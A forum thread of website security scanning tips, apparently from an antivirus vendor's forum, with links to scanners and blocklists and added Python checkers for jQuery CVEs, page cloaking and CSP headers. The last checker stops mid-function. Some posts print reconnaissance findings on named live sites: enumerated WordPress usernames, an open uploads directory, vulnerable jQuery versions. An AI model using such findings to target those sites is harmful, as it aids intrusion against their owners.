Request ID: AXrfJDWsRhfiwYJsDrXX-XXXXXXXvv4YncRR5pRQcGpV_PTet1icSg== (XXX by me for obvious reasons, pol).


polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 18, 2021, 05:20:00 PM
I report webforum spammers here: (random example) https://ip-46.com/146.196.34.252
Also mentioned here: https://www.projecthoneypot.org/ip_146.196.34.37

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on September 18, 2021, 05:42:21 PM
I report webforum spammers here: (random example) https://ip-46.com/146.196.34.252
Also mentioned here: https://www.projecthoneypot.org/ip_146.196.34.37

polonus

Nothing unusual there, Indian IP that SFS also indicates reported spammers, most of the spammers hitting the forum are also Indian IP addresses, but you can't block them all.
Title: Re: Tests and other Media topics
Post by: polonus on September 18, 2021, 06:51:40 PM
Hi DavidR,

Before making them disappear with account and including all topics and postings, I note the IP and report it.

Agree with you that a Delhi IP address may be hosting a variety of such mainly webforum Coinbase phone number spammers, that seem also involved in all sorts of other attack and abuse activities.
For many a continuous pain in the neck. Sending them to digital oblivion seems the sensible thing to do.

And it is not only the spammer but also those that offer them a hiding-place to start their evil trade from.
Not doing anything just seems the other extreme for me.

But I agree you are right in your conclusions, as you most often are,

Kind regards,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 15, 2021, 11:58:00 AM
Online Proxifier Profile Creator by hilebol: https://hilebol.space/proxifier-profile-creator/

Test:
https://hidemy.name/tr/proxy-checker/  &  https://checkerproxy.net/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2021, 11:04:39 PM
Checking URLhaus browse links at VT.
Example: https://urlhaus.abuse.ch/url/1688922/

Checked: 6 engines flagged 4 hrs ago: https://www.virustotal.com/gui/url/f68fd30a505fece0f4efae6fc5c717347b6db677757071a972fac3266e778587/detection

Results for the CloudFlare IP on VT: https://www.virustotal.com/gui/ip-address/104.21.77.66/relations

Website being blacklisted: https://sitecheck.sucuri.net/results/a.gogamea.com/userhome/2202/any.exe

Redirect scan at VT, flagged by 5: https://www.virustotal.com/gui/url/bba9a9547d48a12c809efbb1d45ff8c4ec791f16e507146891be9d14345bc580

Webroot classifies site as malware site.  Abuse going on on a cloudflare server.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2021, 01:33:32 PM
DNSViz: https://dnsviz.net/d/www.splunk.com/dnssec/

EDNS Compliance Tester: https://ednscomp.isc.org/ednscomp/16a499e8f2

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2021, 06:50:44 PM
Or start a website project here: https://sitechecker.pro/app/main/dashboard  (free demo)

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 24, 2021, 12:38:17 AM
Check on and report spammers:

https://ip-46.com/212.102.33.248#ip-feeds
https://cleantalk.org/blacklists/212.102.33.248
https://www.abuseipdb.com/whois/212.102.33.248
https://scamalytics.com/ip/212.102.33.248
https://www.zerospam.org/ip-blacklist/212.102.33.248/

Whenever spammers are met, report them, so they could end up inside blocklists,
so they can be where they should reside, and that is digital oblivion.

polonus

P.S. polonus as member of ASO (Anti-Spam-Offensive)
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2021, 11:50:09 AM
Why certain cookies, as mentioned with example, should be blocked.

Data is processed in countries without a suitable level of data protection.
When you do not allow webpushr it is being blocked by uMatrix and Cookienator.

Check and read: https://cookiedatabase.org/service/webpushr/

Other resources with another example:
https://cookie-scanner.com/summary/stripe.com?ucrid=CRICC8eb6d94e4e9b1dccf2054eda08bd4ff2

For third party AnalyticsSyncHistory cookies:
https://cookie-scanner.com/summary/www.avaloncx.com?ucrid=CRICCd9143443b9686958de3de4c56d5425f2
Indexable by every bot. Self-referencing canonical

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 08, 2021, 01:03:18 PM
Test canvas fingerprinting aspects inside your browser:
https://canvasblocker.kkapsner.de/test/

Tested with CyDec Security Anti-FP extension.

Firefox Focus browser has fingerprinting per default aboard.

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2021, 03:18:11 PM
Avast Secure Browser follows the Chrome 95.0 specifications here: https://privacytests.org/

Also see the tenta.com/test & browser privacy test gives an overall score of 45/100. (webbrowsertools.com)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 18, 2021, 10:39:51 PM
How to work webhint inside the browser's development console?
Install the extension and then open Ctrl+Shift+I now. After that click hint at the top far right in the developer's console.

Hint will go over the page opened and inform you with tips (hints/issues).

Example for: htxps://ai-techpark.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
CSS features with 2 warnings: 'outline-offset' is not supported by Internet Explorer.
'content-type' header charset value should be 'utf-8'.

'content-type' header media type value should be 'text/javascript', not 'application/x-javascript'.

HTML: Resource should use cache busting but URL does not match configured patterns.

JS: JavaScript content should be minified. Security header issues.

But there is more with the general site as scanned for by hackertarget wp scan:

Scanned  https://hackertarget.com/wordpress-security-scan/  we will get 6 issues.

Outdated kernel software - outdated WordPress version, outdated plug-ins.

Not being disabled: User Enumeration
The first two user ID's were tested to determine if user enumeration is possible.

Username   Name
ID: 1   techpark   
ID: 2   businesswire   
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. Take note that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

And also here: Directory Indexing
In the test an attempt was made to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is a common information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

Path Tested   Status
/wp-content/uploads/      enabled
/wp-content/plugins/      disabled
Directory indexing is tested on the /wp-content/uploads/ and /wp-content/plugins/ directories. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.

Linked sites and js resources all checked. But you can lint them using webhint one by one.

Retire.js (also a browser extension) finds:
jquery   1.12.4   Found in -https://ai-techpark.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp _____Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   123
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   1
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   1
jquery-migrate   1.4.1   Found in -https://ai-techpark.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1

Enjoy my good friends, enjoy - the developer console, a real trove of security information, opens up gradually  ;)

pol
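How an extension like Retire.js gets from a script URL to the CVE list quoted above, as an added example (my code, not Retire.js): it recognises jQuery core by file name, reads the version either from the name or from the WordPress `?ver=` parameter (ignoring the `-wp` suffix), and compares it with the first release that carries each fix. The 3.4.0 threshold for CVE-2019-11358 is stated in the output above; 3.0.0 for CVE-2015-9251 and 3.5.0 for the two htmlPrefilter CVEs come from those advisories. The script URLs are constructed on a placeholder host, the first two mirroring the WordPress paths quoted above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# CVE -> first jQuery release that contains the fix.
JQUERY_FIXED_IN = {
    "CVE-2015-9251": (3, 0, 0),
    "CVE-2019-11358": (3, 4, 0),
    "CVE-2020-11022": (3, 5, 0),
    "CVE-2020-11023": (3, 5, 0),
}

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")
# jQuery core only: jquery.js, jquery.min.js, jquery-3.5.1.slim.min.js ...
# jquery-migrate, jquery-ui and plugins are deliberately excluded, since
# their version numbers say nothing about the bundled jQuery core.
JQUERY_FILE_RE = re.compile(
    r"^jquery(?:-(\d+\.\d+(?:\.\d+)?))?(?:\.slim)?(?:\.min)?\.js$", re.IGNORECASE
)


def parse_version(text: str):
    """First dotted version in the text as a comparable tuple, or None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part or 0) for part in m.groups())


def jquery_version_from_url(url: str):
    """Version of jQuery core served by this URL, from the file name or the
    WordPress style ?ver= parameter (whose -wp suffix must be ignored)."""
    parts = urlsplit(url)
    filename = parts.path.rsplit("/", 1)[-1]
    m = JQUERY_FILE_RE.match(filename)
    if not m:
        return None
    if m.group(1):
        return parse_version(m.group(1))
    for candidate in parse_qs(parts.query).get("ver", []):
        version = parse_version(candidate)
        if version:
            return version
    return None


def vulnerable_cves(version) -> list[str]:
    """CVEs whose fix landed in a release newer than the one served."""
    return sorted(cve for cve, fixed in JQUERY_FIXED_IN.items() if version < fixed)


def check_script_url(url: str) -> dict:
    version = jquery_version_from_url(url)
    if version is None:
        return {"url": url, "version": None, "cves": []}
    return {"url": url, "version": ".".join(map(str, version)),
            "cves": vulnerable_cves(version)}


# Constructed script URLs on a placeholder host.
SAMPLE_SCRIPTS = [
    "https://example.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp",
    "https://example.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1",
    "https://example.com/assets/jquery-3.4.1.min.js",
    "https://example.com/assets/jquery-3.5.1.slim.min.js",
]


if __name__ == "__main__":
    for url in SAMPLE_SCRIPTS:
        r = check_script_url(url)
        print(r["version"], r["cves"], url)
```

A 1.12.4 core matches all four CVEs, a 3.4.1 build still matches the two htmlPrefilter ones, and 3.5.1 matches none; jquery-migrate is skipped rather than misreported, which is the false positive a naive `?ver=` grep would produce.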


Title: Re: Tests and other Media topics
Post by: DavidR on November 19, 2021, 12:29:45 AM
How to work webhint inside the browser's development console?
Install the extension and then open Ctrl+Shift+I now. After that click hint at the top far right in the developer's console.
<snip>
pol

It's a shame that the old URL scanner link doesn't work any more, -https://webhint.io/scanner/ I get a 404 error on that link now.

Not sure I would want to install a browser add-on to carry out these checks (if that is what it is doing).
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 06:22:31 AM
@ DavidR,

Happens all the time. Webhint is not the only online scanner, that has disappeared over time. Some don't even reappear as an extension for use inside the developer's console. Google won't allow online dom-xss scanners, but allows instances like questionable Punkspider.

So webhint has now been reduced to a community of approx. 4.000 developers.
Glad I could make it back to work for the website analysis I do here.

But the going gets more and more narrow all the time.
Just another script taken off of tampermonkey, because Google insists on -180.upload.com, -4upfiles.com and -get.adobe.com
no longer being blocked by that particular script, and it seems "they call the shots globally".

Alas, it is like it is,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 05:09:08 PM
Another disadvantage of using extensions in the developer console is that it is not suited for webpage scanning,
as a website could be potentially malicious. Then an online third party scan could be the only secure option left
or using a special browser like Bobby's Malzilla for instance with a specific VM.

Malware should be studied on a stand alone offline device, one not being connected to the Internet.

So there are a couple of online scanners left.
For instance, this one: https://www.web-malware-removal.com/website-malware-virus-scanner/

Checked a site and it is OK, but has some server related issue:
Quote
Server Details:

apache

Google and Web-Browser Content different! (an issue known as so-called "cloaking", pol).
Google: 64539 bytes       Firefox: 64743 bytes,    Diff:   204 bytes

l" class="rss_link">rss</a> <a href="-https://twitter.com/securitynl" target="_blank" class="twitter_link">twitter</a> </div> </div> </div> </div> </body> </html> ...

Suspicious links found
-https://www.certifiedsecure.com --> ''
-https://www.certifiedsecure.com/live?q=secnl20211116 --> ' '

HTML Source: View -> -https://www.websicherheit.at/_d/hilite.php?url=https://www.security.nl

Console information received:
Quote
Failed to load resource: net::ERR_FILE_NOT_FOUND
hilite.php:1 Access to fetch at '-https://s-install.avcdn.net/aos/assets/prod/translations/Locale-en-US.json' from origin 'https://www.websicherheit.at' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.
s-install.avcdn.net/aos/assets/prod/translations/Locale-en-US.json:1 Failed to load resource: net::ERR_FAILED
userscript.html?name=AdRemover.user.js&id=2e3eadc0-39e9-4512-bab0-1e350c99d118:236 Starting AdRemover 8.5 on https://www.websicherheit.at/_d/hilite.php?url=https://www.security.nl ...
userscript.html?name=AdRemover.user.js&id=2e3eadc0-39e9-4512-bab0-1e350c99d118:760 AdRemover 8.5 has finished it's work! [89 ms]
VM42:69 Syntax error @ "Malware Script Detector v 1.1 Enhanced"!
##########################
JSHINT output:
##########################

SyntaxError: Unexpected identifier
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (:2:115), <anonymous>:67:477)
    at Object.create (eval at exec_fn (:2:115), <anonymous>:69:193)
    at c (eval at exec_fn (:2:115), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (:2:115), <anonymous>:5:165)
    at eval (eval at exec_fn (:2:115), <anonymous>:5:292)
eval @ VM42:69
VM42:69 Syntax error @ "Alert DOM-XSS Userscript"!
##########################
JSHINT output:
##########################

SyntaxError: Invalid regular expression flags
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (:2:115), <anonymous>:67:477)
    at Object.create (eval at exec_fn (:2:115), <anonymous>:69:193)
    at c (eval at exec_fn (:2:115), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (:2:115), <anonymous>:5:165)
    at eval (eval at exec_fn (:2:115), <anonymous>:5:292)
eval @ VM42:69
VM42:69 Uncaught SyntaxError: Unexpected identifier
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:67:477)
    at Object.create (eval at exec_fn (hilite.php:2), <anonymous>:69:193)
    at c (eval at exec_fn (hilite.php:2), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (hilite.php:2), <anonymous>:5:165)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:5:292)
VM42:69 Uncaught SyntaxError: Invalid regular expression flags
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:67:477)
    at Object.create (eval at exec_fn (hilite.php:2), <anonymous>:69:193)
    at c (eval at exec_fn (hilite.php:2), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (hilite.php:2), <anonymous>:5:165)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:5:292)
userscript.html?name=AdRemover.user.js&id=2e3eadc0-39e9-4512-bab0-1e350c99d118:260 Starting AdRemover 8.5 on
-https://www.websicherheit.at/_d/hilite.php?url=htxps://www.security.nl 4 seconds after page load ...
102VM94 watch-expression-1.devtools:1 Timer 'default' already exists
(anonymous) @ VM94 watch-expression-1.devtools:1

We could also audit using Lighthouse and node.js.
Final results:

Webpage Score
Malware A Spam A Phishing A
External Status
Blacklisting A Google Spam A
Server C
 
polonus
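The "Google and Web-Browser Content different!" line in the scan result above comes from fetching the same page as a crawler and as a browser and diffing the two copies. The following is an added example of that check, not the scanner's own code: the two HTML bodies are constructed sample data, the User-Agent strings are my assumptions, and fetch_variant() is only needed when you point it at a real host.

```python
"""Compare what a site serves to a search-engine crawler with what it serves
to a browser: the check behind "Google and Web-Browser Content different!".

Added example, not the scanner's own code. The two HTML bodies are
constructed sample data; fetch_variant() does the live fetch and is only
used when you call it against a real host.
"""
from __future__ import annotations

import difflib
import urllib.request

# Assumed User-Agent strings for the two variants (any crawler/browser pair works).
USER_AGENTS = {
    "Google": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Firefox": "Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0",
}

# Markup that, when present in only one variant, is worth a closer look.
SUSPICIOUS_MARKERS = ("<script", "<iframe", 'http-equiv="refresh"', "display:none")


def fetch_variant(url: str, user_agent: str, timeout: float = 10.0) -> bytes:
    """Fetch url presenting the given User-Agent (network access; not used offline).

    Usage: fetch_variant(url, USER_AGENTS["Google"]) and USER_AGENTS["Firefox"].
    """
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def normalise(html: bytes) -> list[str]:
    """Non-empty, whitespace-trimmed lines, so re-indentation alone is not a diff."""
    text = html.decode("utf-8", errors="replace")
    return [line.strip() for line in text.splitlines() if line.strip()]


def compare_variants(bodies: dict[str, bytes]) -> dict:
    """Diff two variants of the same page.

    Returns the byte sizes (as the scanner prints them), the markup that only
    one variant contains, whether the variants differ at all, and whether any
    variant-only markup carries a script/iframe/refresh/hidden marker.
    """
    first, second = list(bodies)[:2]
    lines_a, lines_b = normalise(bodies[first]), normalise(bodies[second])
    only_in: dict[str, list[str]] = {first: [], second: []}
    matcher = difflib.SequenceMatcher(None, lines_a, lines_b, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag in ("replace", "delete"):
            only_in[first].extend(lines_a[i1:i2])
        if tag in ("replace", "insert"):
            only_in[second].extend(lines_b[j1:j2])
    extra = only_in[first] + only_in[second]
    return {
        "sizes": {name: len(body) for name, body in bodies.items()},
        "diff_bytes": abs(len(bodies[first]) - len(bodies[second])),
        "only_in": only_in,
        "cloaked": bool(extra),
        "suspicious": any(m in line.lower() for line in extra for m in SUSPICIOUS_MARKERS),
    }


# Constructed sample: the browser copy carries a footer the crawler copy lacks,
# the same kind of rss/twitter footer difference the scan above reported.
CRAWLER_COPY = b"""<html><head><title>Example news site</title></head>
<body>
<h1>Headlines</h1>
<p>Story text that both variants share.</p>
</body></html>
"""
BROWSER_COPY = CRAWLER_COPY.replace(
    b"</body>",
    b'<div class="social"><a href="/rss.xml" class="rss_link">rss</a> '
    b'<a href="https://twitter.com/example" class="twitter_link">twitter</a></div>\n</body>',
)

if __name__ == "__main__":
    report = compare_variants({"Google": CRAWLER_COPY, "Firefox": BROWSER_COPY})
    print("Sizes:", report["sizes"], "Diff:", report["diff_bytes"], "bytes")
    for variant, lines in report["only_in"].items():
        for line in lines:
            print(f"only in {variant}: {line}")
    print("cloaked:", report["cloaked"], "suspicious:", report["suspicious"])
```

A footer-only difference like the one above is reported as cloaked but not suspicious; a script or iframe served to browsers only is the case that deserves manual review.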
Title: Re: Tests and other Media topics
Post by: DavidR on November 19, 2021, 07:42:45 PM
Another disadvantage of using extensions in the developer console is that it is not suited for webpage scanning,
as a website could be potentially malicious. Then an online third party scan could be the only secure option left
or using a special browser like Bobby's Malzilla for instance with a specific VM.

Malware should be studied on a stand alone offline device, one not being connected to the Internet.

So there are a couple of online scanners left.
For instance, this one: https://www.web-malware-removal.com/website-malware-virus-scanner/

Checked a site and is OK, but has some server related issue:
Quote
Server Details:

apache

Google and Web-Browser Content different! (an issue known as so-called "cloaking" - pol)
Google: 64539 bytes       Firefox: 64743 bytes,    Diff:   204 bytes

l" class="rss_link">rss</a> <a href="-https://twitter.com/securitynl" target="_blank" class="twitter_link">twitter</a> </div> </div> </div> </div> </body> </html> ...

Suspicious links found
-https://www.certifiedsecure.com --> ''
-https://www.certifiedsecure.com/live?q=secnl20211116 --> ' '

HTML Source: View -> -https://www.websicherheit.at/_d/hilite.php?url=https://www.security.nl
<snip>
polonus


Thanks for the link, I will check it out soon no doubt.
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 10:42:03 PM
But before you start, study a particular subject - like for instance the ins and outs of DOM-XSS sinks and sources.
Also read from stackoverflow and other resources. A researcher/error-hunter should read-inform-read-inform
to get familiar with all the aspects of what he or she is doing.

Whenever you are into a form of particular specific scanning,
be ready to make yourself familiar with resources, for instance by using spreadsheets.

For DOM-XSS sinks and sources like these examples:
https://docs.google.com/spreadsheets/d/1Mnuqkbs9L-s3QpQtUrOkPx6t5dR3QyQo24kCVYQy7YY/edit#gid=0

The above spreadsheet is meant to work on a specific native jQuery version.

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 11:14:46 PM
Next to a website address (URL or URI) one should also always check the corresponding IP (there could be several) for that particular website.

IP could be on a banlist, check: https://www.dnsqueries.com/en/check_banned_ip.php
Also check here: http://www.brightcloud.com/tools/url-ip-lookup.php
or here: https://www.threatcrowd.org/ip.php?ip=216.58.208.33 (random example)
or here: https://hetrixtools.com/  or  http://webyzer.net/ip/181.224.138.136 (random example)
or here: https://www.abuseipdb.com/check/46.126.113.90 (random example)
or here: https://www.ip-tracker.org/lookup.php?ip=102.66.223.235 (random example)

Also at VT we could find a lot of information just by entering and querying a particular IP.
And where I also regularly report: https://ip-46.com/  IP v4 v6 Intelligence, (fine resources  ;) ),

Good hunt,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 23, 2021, 10:40:25 PM
Before visiting a Magento webshop website, it is a good idea to scan it at magereport.com.

Maybe some webshops might have been splendidly developed at first, but weren't updated in time:
random example: https://www.magereport.com/scan/?s=https://hoegl.com/  (outdated Magento version)

There are always threats around the corner: https://www.ncsc.gov.uk/news/guidance-for-retailers-to-prevent-websites-becoming-black-friday-cyber-traps

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2021, 12:06:37 PM
We all may have used these well-known free online website malware scanners at some moment in time:
Re: https://geekflare.com/online-scan-website-security-vulnerabilities

This is a not so well-known website privacy scanner: https://themarkup.org/blacklight?url=

For those on Tor looking for "bad relays": https://metrics.torproject.org/  also: https://intelx.io/ (blocked from use inside Tor)

Enjoy, my good friends, enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 07, 2021, 01:19:36 PM
To eventually detect traces of a Pegasus snoopware compromise,
MVT (Mobile Verification Toolkit) has now been developed for Android.
Re: http://github.com/mvt-project/mvt

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 11, 2021, 01:19:20 PM
Check your WordPress plug-ins for vulnerabilities and latest updates.

55,9% of WordPress CMS websites are being hacked through vulnerable plugins.

Hackers can run all sorts of malicious activities like stealing data, running unwanted ads, defacing websites etc.
Furthermore this may redirect visitors, lead to injected spam and content, installed malcreations (malware),
creation of rogue admin accounts, all wreaking havoc on website revenues and your online reputation.

Also various bad things may happen with bad configuration seen after install, that means
'user enumeration' not set to disabled, and also 'directory listing' not set to disabled.

There are over 50.000 WordPress plugins and new ones created every day,
and also some abandoned by their developers (leaving vulnerable code).

Those attacked recently: Duplicator, ThemeGrill Demo Importer, Profile Builder, various WooCommerce plugins, ThemeREX,
Async JS, Modern Events Calendar, Google Maps plug-in. (info source - malware dot com dot blog).

Do a quick and dirty scan at https://hackertarget.com and perform a free WordPress security scan there.
Do a passive scan: https://hackertarget.com/wordpress-security-scan/

Another low-impact scanner: http://wprecon.com/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on December 11, 2021, 02:42:33 PM
No desktop no add-ons
adds up to
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/11/13/41/crlXIpV2tC0/preview.jpg)


Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2021, 05:59:57 PM
Go on testing and analyzing with a robots.txt tester and validator:
https://www.websiteplanet.com/webtools/robots-txt/?url=forum.avast.com

No results for this one, because the forum is not indexable; only links to be followed.

But here 1 error and 8 warnings: https://www.websiteplanet.com/webtools/robots-txt/?url=wordpress.com

Good informative info for website developers,

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2021, 06:15:25 PM
The following test page should give you an error inside the browser:
https://pinning-test.badssl.com/

This site is preloaded with a bad HPKP pin.
It checks that your HTTPS security is OK. No guv-snooping certs implemented?

Excellent test: https://www.ssllabs.com/ssltest/analyze.html?d=pinning-test.badssl.com

And for other online scanners: https://geekflare.com/ssl-test-certificate/

OK inside your browser? Re: https://www.howsmyssl.com/

pol



Title: Re: Tests and other Media topics
Post by: polonus on December 24, 2021, 01:16:30 AM
Many fine tools grouped here: https://dnschecker.org/website-server-software.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 24, 2021, 01:00:37 PM
CSP not implemented according to best policies:
Even on a site like:
https://transparencyreport.google.com/safe-browsing/search?url=forum.avast.com
Quote
Result
CSP Protection Active
CSP Reporting Full
CSP Validity Valid

XSS Strong CSP Protection
Clickjacking No CSP Protection
Formjacking Weak CSP Protection

General
Weak CSP Protection
Summary
6 Fatal Errors
10 Warnings
6 Info
4 Valid
Content Security Policy (CSP)
Edit CSP
script-src
  'nonce-aPfse2kvXXXXXXBu8VkzKA'
  'report-sample'
  'unsafe-inline';
object-src
  'none';
base-uri
  'self';
worker-src
  'self';
report-uri
  /cspreport;
General
CSP
report-uri
Add another 'report-uri' to get better violation reports.
form-action
This directive does not fallback to 'default-src'. Can you restrict 'form-action' to 'none' or 'self'?
Necessary Directives
CSP
default-src
'default-src' is missing. Add it for more fine-grained control and reporting.
CSP
base-uri
CSP
frame-ancestors
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
'frame-ancestors' directive, is more powerful and flexible than the X-Frame-Options, and considered necessary in order to properly prevent Clickjacking attacks. Can you restrict 'frame-ancestors' to 'none' or 'self'?
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
CSP
upgrade-insecure-requests
Add 'upgrade-insecure-requests' to protect from ManInMiddle attacks. Another (more strict) option is to use 'block-all-mixed-content' to block mixed content resources (rather than updgrade to secure).
Scripting Directives
CSP
script-src
CSP
style-src
'style-src' is missing and recommended to increase general protection. Can you set 'none' or a specific file/path?
CSP
object-src
CSP
worker-src
Frames Directives
CSP
child-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatability, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
CSP
frame-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatability, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
Content Directives
CSP
img-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'img-src' is missing. Add it for more fine-grained control and reporting.
CSP
connect-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'connect-src' is missing. Add it for more fine-grained control and reporting.
CSP
font-src
'font-src' is missing. Add it for more fine-grained control and reporting.
CSP
manifest-src
'manifest-src' is missing. Add it for more fine-grained control and reporting.
CSP
media-src
'media-src' is missing. Add it for more fine-grained control and reporting.
CSP
prefetch-src
'prefetch-src' is missing. Add it for more fine-grained control and reporting.
resulting in a B-Grade protection.

polonus
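The report quoted above boils down to a handful of directive checks (missing default-src, missing frame-ancestors, no form-action, no upgrade-insecure-requests, fetch directives with nothing to fall back on). Below is an added example that reproduces those checks in code; it is my own parser and rule set, not the forum's or the evaluator's code. QUOTED_POLICY is the policy as printed in the post and HARDENED_POLICY is my own suggestion of the fixes the report asks for.

```python
"""Checker for the Content-Security-Policy findings quoted in the post above.

Added example, not the forum's or the evaluator's code: parser and rules are
mine, written to reproduce the quoted checks. QUOTED_POLICY is the policy
quoted in the post; HARDENED_POLICY is my suggested fix.
"""
from __future__ import annotations

# Fetch directives the quoted report lists as "missing". When absent they fall
# back to default-src, which is why a missing default-src is the first finding.
FETCH_DIRECTIVES = ("script-src", "style-src", "img-src", "connect-src", "font-src",
                    "manifest-src", "media-src", "prefetch-src", "child-src",
                    "frame-src", "object-src", "worker-src")
STRICT_KEYWORDS = {"'none'", "'self'"}
NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header value into {directive: [source expressions]}.

    Directives are ';'-separated; the first token is the case-insensitive name.
    Browsers honour only the first occurrence of a duplicated directive, so
    later duplicates are dropped here as well.
    """
    policy: dict[str, list[str]] = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def is_strict(sources: list[str]) -> bool:
    """'none', 'self' or a concrete host/path allowlist: no bare '*',
    no '*.' wildcard hosts and no scheme-only entries such as https:."""
    if not sources:
        return False
    return all(s in STRICT_KEYWORDS
               or not (s == "*" or s.startswith("*.") or s.endswith(":"))
               for s in sources)


def check_csp(header: str) -> dict[str, list[str]]:
    """Return {'fatal': [...], 'warning': [...], 'info': [...]} findings."""
    p = parse_csp(header)
    fatal: list[str] = []
    warning: list[str] = []
    info: list[str] = []

    if "default-src" not in p:
        fatal.append("default-src missing: absent fetch directives have no fallback")
    # frame-ancestors governs who may embed this page; frame-src/child-src only
    # govern what the page itself embeds, so only the former stops clickjacking.
    if "frame-ancestors" not in p:
        fatal.append("frame-ancestors missing: no CSP clickjacking protection")
    elif not is_strict(p["frame-ancestors"]):
        warning.append("frame-ancestors is not a strict allowlist")
    # form-action never falls back to default-src, so it must be explicit.
    if "form-action" not in p or not is_strict(p["form-action"]):
        warning.append("form-action missing or loose: form posts may go anywhere")
    if "upgrade-insecure-requests" not in p and "block-all-mixed-content" not in p:
        warning.append("upgrade-insecure-requests missing: mixed content not handled")
    if p.get("object-src") != ["'none'"]:
        warning.append("object-src should be 'none'")
    if not is_strict(p.get("base-uri", [])):
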